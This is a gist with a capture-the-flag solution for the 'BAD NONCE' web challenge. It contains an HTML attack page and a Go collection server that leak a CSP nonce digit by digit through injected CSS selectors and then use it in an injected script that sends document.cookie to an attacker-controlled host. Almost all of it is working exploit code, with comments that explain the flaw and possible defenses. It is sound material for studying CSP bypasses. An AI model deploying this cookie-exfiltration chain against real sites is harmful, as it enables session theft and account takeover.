@rekkusu
Created May 5, 2019 08:20
TSG CTF 2019 / BAD NONCE 1 & 2
<!--
  Second-stage page. Presumably this is getflag.html, which the Go server in
  this gist serves at /getflag (TODO confirm; file names are not shown here).
  It reads the value returned by /nonce and writes an iframe whose q parameter
  carries a script element bearing that value as its nonce attribute; that
  script navigates to /flag on [server] with document.cookie appended.
  NOTE(review): this can only work if the target accepts the same nonce on a
  later response. A CSP nonce is meant to be freshly generated for every
  response, so the reuse shown here looks like the weakness the challenge
  title refers to. Confirm against the challenge source.
-->
<script>
fetch('/nonce').then(r => r.text()).then(nonce => {
document.write('<iframe src="http://35.187.214.138:10023/?q=<script nonce='+nonce+'>location.href=\'//[server]/flag?f=\'%2Bdocument.cookie\x3c\x2fscript>"></iframe>');
});
</script>
<iframe src="http://35.187.214.138:10023/?q=<base href=//[server]><meta http-equiv='Content-Style-Type' content=text/css><link rel=stylesheet href=log.css><link rel=stylesheet href=log.css><link rel=stylesheet href=log.css><link rel=stylesheet href=log.css><link rel=stylesheet href=log.css><link rel=stylesheet href=log.css><link rel=stylesheet href=log.css><link rel=stylesheet href=log.css><link rel=stylesheet href=log.css><link rel=stylesheet href=log.css><link rel=stylesheet href=log.css><link rel=stylesheet href=log.css><link rel=stylesheet href=log.css><link rel=stylesheet href=log.css><link rel=stylesheet href=log.css><link rel=stylesheet href=log.css><link rel=stylesheet href=log.css><link rel=stylesheet href=log.css><link rel=stylesheet href=log.css><link rel=stylesheet href=log.css><link rel=stylesheet href=log.css><link rel=stylesheet href=log.css><link rel=stylesheet href=log.css><link rel=stylesheet href=log.css><link rel=stylesheet href=log.css><link rel=stylesheet href=log.css><link rel=stylesheet href=log.css><link rel=stylesheet href=log.css><link rel=stylesheet href=log.css><link rel=stylesheet href=log.css><link rel=stylesheet href=log.css><link rel=stylesheet href=log.css>"></iframe>
<!--
  Navigates to /getflag on [server] one second after this script runs.
  The delay is a fixed timer: nothing here waits for the stylesheet requests
  issued by the iframe above to finish. Presumably one second was enough in
  practice (TODO confirm).
-->
<script>
setTimeout(function() { location.href = "http://[server]/getflag"; }, 1000);
</script>
package main
import (
"strings"
"sync"
"github.com/labstack/echo"
"github.com/labstack/echo/middleware"
)
// main runs the collection server that the HTML pages in this gist talk to.
//
// Routes registered below:
//   - "/" and "/getflag" serve index.html and getflag.html.
//   - "/log.css" returns sixteen CSS rules, one per hex digit. Each rule
//     matches any element whose nonce attribute starts with the prefix stored
//     so far plus that digit, and points background-image at /capture with
//     that candidate as the value parameter.
//   - "/capture" stores the reported value as the new prefix.
//   - "/nonce" returns the prefix stored so far.
//
// The mutex is used as a gate rather than for mutual exclusion: every
// /log.css request locks it and never unlocks it, and /capture unlocks it,
// so after the first stylesheet each further one waits for a /capture hit.
//
// Defensive reading (inferred; the target's policy is not shown here): the
// flow relies on the nonce staying the same across responses and on injected
// markup being able to load stylesheets and images from another origin after
// a <base> override. A nonce regenerated per response, or restrictive
// style-src, img-src and base-uri directives, would each break a step.
func main() {
	srv := echo.New()
	gate := new(sync.Mutex)
	prefix := ""

	// Log only the status code and the requested URI for each request.
	logCfg := middleware.LoggerConfig{
		Format: "${status} ${uri}\n",
	}
	srv.Use(middleware.LoggerWithConfig(logCfg))

	srv.Static("/", "index.html")
	srv.Static("/getflag", "getflag.html")

	srv.GET("/capture", func(c echo.Context) error {
		// NOTE(review): the gate is released before the prefix is written, so
		// a waiting /log.css handler can read the old prefix. Unlocking a
		// mutex that is not locked is a fatal runtime error in Go.
		gate.Unlock()
		prefix = c.QueryParam("value")
		return c.NoContent(200)
	})

	srv.GET("/log.css", func(c echo.Context) error {
		gate.Lock()

		// "CH" is the placeholder replaced by each candidate prefix.
		const rule = "*[nonce^='CH'] {background-image: url(http://[server]/capture?value=CH);}\n"
		const hexDigits = "0123456789abcdef"

		var sheet strings.Builder
		for _, digit := range hexDigits {
			sheet.WriteString(strings.ReplaceAll(rule, "CH", prefix+string(digit)))
		}

		// Forbid caching so every stylesheet request reaches this handler.
		c.Response().Header().Set("Cache-Control", "private, no-store, no-cache, must-revalidate")
		return c.Blob(200, "text/css", []byte(sheet.String()))
	})

	srv.GET("/nonce", func(c echo.Context) error {
		return c.String(200, prefix)
	})

	// The error returned by Start is not inspected.
	srv.Start(":10000")
}